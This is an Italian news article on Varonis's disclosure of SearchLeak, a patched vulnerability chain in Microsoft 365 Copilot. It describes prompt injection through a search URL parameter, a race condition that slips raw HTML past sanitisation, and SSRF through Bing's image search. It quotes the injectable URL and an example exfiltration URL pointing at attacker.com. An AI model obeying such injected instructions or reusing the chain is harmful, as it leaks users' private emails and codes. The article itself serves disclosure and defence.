Una ricerca pubblicata da Varonis Threat Labs ha individuato una catena di vulnerabilità denominata SearchLeak capace di trasformare Microsoft 365 Copilot Enterprise in uno strumento involontario di esfiltrazione delle informazioni.

La vulnerabilità, identificata come CVE-2026-42824 e corretta da Microsoft prima della divulgazione pubblica, dimostra come la combinazione di tecniche tradizionali e attacchi specifici contro i modelli linguistici possa generare scenari di rischio difficili da individuare con i normali controlli di sicurezza.

La scoperta di questa nuova vulnerabilità avviene in un contesto in cui l’adozione crescente degli assistenti basati su intelligenza artificiale sta modificando profondamente il modo in cui le organizzazioni accedono e gestiscono le informazioni aziendali. SearchLeak dimostra che la concentrazione di grandi quantità di dati sensibili all’interno di questi strumenti crea nuove opportunità per gli attaccanti.

L’inizio dell’attacco SearchLeak

La ricerca di Varonis evidenzia una tecnica chiamata Parameter-to-Prompt Injection (P2P). In questo scenario, i parametri contenuti all’interno di un URL non vengono interpretati esclusivamente come elementi di ricerca ma possono essere trasformati in vere e proprie istruzioni destinate al modello linguistico.

In pratica, un aggressore può costruire un link apparentemente innocuo che, una volta aperto dall’utente, induce Copilot a eseguire azioni non previste.

Il meccanismo sfrutta la tendenza dei modelli AI a trattare differenti sorgenti di input come parte di un unico contesto conversazionale, creando un ponte tra i dati controllati dall’attaccante e le informazioni aziendali riservate.

Il modello può quindi essere indotto a cercare informazioni specifiche all’interno del tenant Microsoft 365 della vittima, ad esempio su e-mail recenti, documenti riservati o codici di autenticazione contenuti nei messaggi di posta.

La catena di compromissione SearchLeak

L’efficacia di SearchLeak non deriva tuttavia solo da un attacco di tipo P2P ma dalla combinazione di più vulnerabilità ognuna delle quali risulta propedeutica alla successiva.

Infatti, i ricercatori hanno dimostrato come la P2P possa essere affiancata a una “race condition” durante il processo di rendering delle risposte (streaming) e a una vulnerabilità di tipo Server-Side Request Forgery (SSRF).

Fonte: Varonis.

Immaginiamo dunque un dipendente che utilizza quotidianamente Microsoft 365 Copilot per cercare documenti, consultare e-mail e ottenere rapidamente informazioni presenti nell’ambiente aziendale.

L’attacco SearchLeak inizia quando questa persona riceve un collegamento apparentemente legittimo e lo apre.

A differenza di molte campagne di phishing tradizionali, il link in questione non scarica malware né reindirizza verso un sito sospetto ma il suo unico scopo è quello di sfruttare il modo in cui Copilot interpreta alcune informazioni contenute nell’URL. All’interno del collegamento sono infatti presenti parametri appositamente progettati dall’attaccante (P2P).

“Il punto di partenza è familiare. Microsoft 365 Copilot Search accetta il parametro q:

https[:]//m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=<PROMPT>

Questo parametro è pensato per le query di ricerca in linguaggio naturale. Il problema è che qualsiasi cosa si inserisca in q viene interpretata dal motore di intelligenza artificiale di Copilot, non solo come stringa di ricerca, ma anche come istruzioni da seguire”, spiega Dolev Taler, Security Researcher di Varonis.

Quando la richiesta viene elaborata, Copilot non tratta questi parametri come semplici elementi tecnici, ma li interpreta come istruzioni. In pratica, il modello AI viene indotto a eseguire una ricerca specifica all’interno dei dati aziendali accessibili all’utente.

Nell’esempio riportato da Varonis il prompt iniettato indica a Copilot di cercare tra le e-mail dell’utente, estrarre il titolo e incorporarlo in un URL di una immagine, ma si potrebbe estrarre parole chiave, informazioni finanziarie o persino codici temporanei di autenticazione presenti nella posta elettronica.

Una volta ricevute queste istruzioni, Copilot, utilizzando le autorizzazioni dell’utente autenticato, interroga Microsoft Graph e recupera le informazioni richieste. Dal punto di vista del sistema tale attività non risulta anomala, perché l’assistente sta semplicemente accedendo a dati che l’utente è autorizzato a consultare, ed è proprio questo uno degli aspetti più insidiosi dell’attacco. Non viene sfruttato un accesso illegittimo ai dati, ma un accesso perfettamente legittimo che viene manipolato per finalità malevole.

La corsa contro il tempo per l’esfiltrazione

A questo punto poiché i dati che sono stati recuperati da Copilot, sono ancora confinati all’interno della risposta generata dall’assistente, l’attaccante per portarli all’esterno prova ad aggirare i meccanismi di sicurezza che normalmente impediscono l’esecuzione di codice pericoloso nelle risposte visualizzate dall’utente, sfruttando una vera e propria corsa contro il tempo.

Al riguardo i ricercatori hanno individuato una finestra temporale estremamente ridotta (correlata ad una “race condition”) che permette di inserire alcuni elementi HTML prima che il sistema completi il processo di pulizia e sanitizzazione del contenuto (tale processo prevede di racchiudere il codice HTML in blocchi <code> in modo che il browser lo tratti come testo e non come markup).

L’attaccante riesce, in tal modo, a preparare il terreno per l’esfiltrazione finale delle informazioni.

Fonte: Varonis.

Il passaggio successivo consiste infatti nell’utilizzare tali elementi HTML grezzi per attivare una richiesta con un tag <img>, indirizzata verso servizi Microsoft autorizzati, che incorpora nell’URL il segreto rubato (nell’esempio il titolo della e-mail).

In questo caso, viene sfruttata una vulnerabilità di tipo Server-Side Request Forgery che coinvolge l’infrastruttura di ricerca Bing.

Invece di tentare una connessione diretta verso un server controllato dall’attaccante, operazione che potrebbe essere bloccata dalle politiche di sicurezza del browser (CSP – Content Security Policy), i dati vengono incorporati in richieste che transitano attraverso il motore di ricerca di Microsoft considerato affidabile.

“Bing dispone di una funzione Ricerca per immagine che accetta un parametro URL:

https[:]//www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png.

Quando questo endpoint riceve una richiesta, il backend di Bing esegue un recupero lato server dell’URL dell’immagine per analizzarla. Questo recupero proviene dall’infrastruttura di Bing, non dal browser della vittima.”, continua Taler e conclude “Bing diventa involontariamente un proxy per l’esfiltrazione di dati. Un classico SSRF, nascosto in bella vista dietro una voce nella lista di autorizzazione di un CSP”.

Dal punto di vista delle protezioni di sicurezza, il traffico appare quindi legittimo. Il browser vede una comunicazione diretta verso infrastrutture Microsoft e non rileva comportamenti anomali.

Tuttavia, dietro le quinte, queste richieste consentono di trasportare le informazioni recuperate da Copilot fino a una destinazione controllata dall’aggressore che recupera il dato rubato registrando una richiesta GET (che contiene nel path il titolo dell’email esfiltrata).

Fonte: Varonis.

I dati escono così dal perimetro aziendale senza generare quegli allarmi che normalmente accompagnerebbero un tentativo di esfiltrazione.

Un segnale importante per la sicurezza dell’AI

SearchLeak conferma una tendenza già osservata negli ultimi anni. Le piattaforme di intelligenza artificiale non introducono necessariamente vulnerabilità completamente nuove, ma possono amplificare l’impatto di problemi già esistenti creando percorsi di attacco inediti.

La capacità degli assistenti AI di accedere contemporaneamente a molteplici repository aziendali li rende obiettivi particolarmente interessanti per i criminali informatici. Un errore di progettazione apparentemente limitato può trasformarsi quindi rapidamente in un incidente con conseguenze molto più estese rispetto a quelle osservabili nelle applicazioni tradizionali.

Per questo motivo la sicurezza degli strumenti AI deve essere considerata parte integrante delle strategie di protezione delle informazioni e non un semplice requisito extra. SearchLeak dimostra che la sicurezza dell’intelligenza artificiale non dipende esclusivamente dall’affidabilità del modello linguistico.

La protezione dei dati, la gestione delle autorizzazioni e il controllo delle integrazioni rappresentano elementi altrettanto cruciali per evitare che uno strumento progettato per aumentare la produttività diventi una nuova superficie di attacco per i cyber criminali.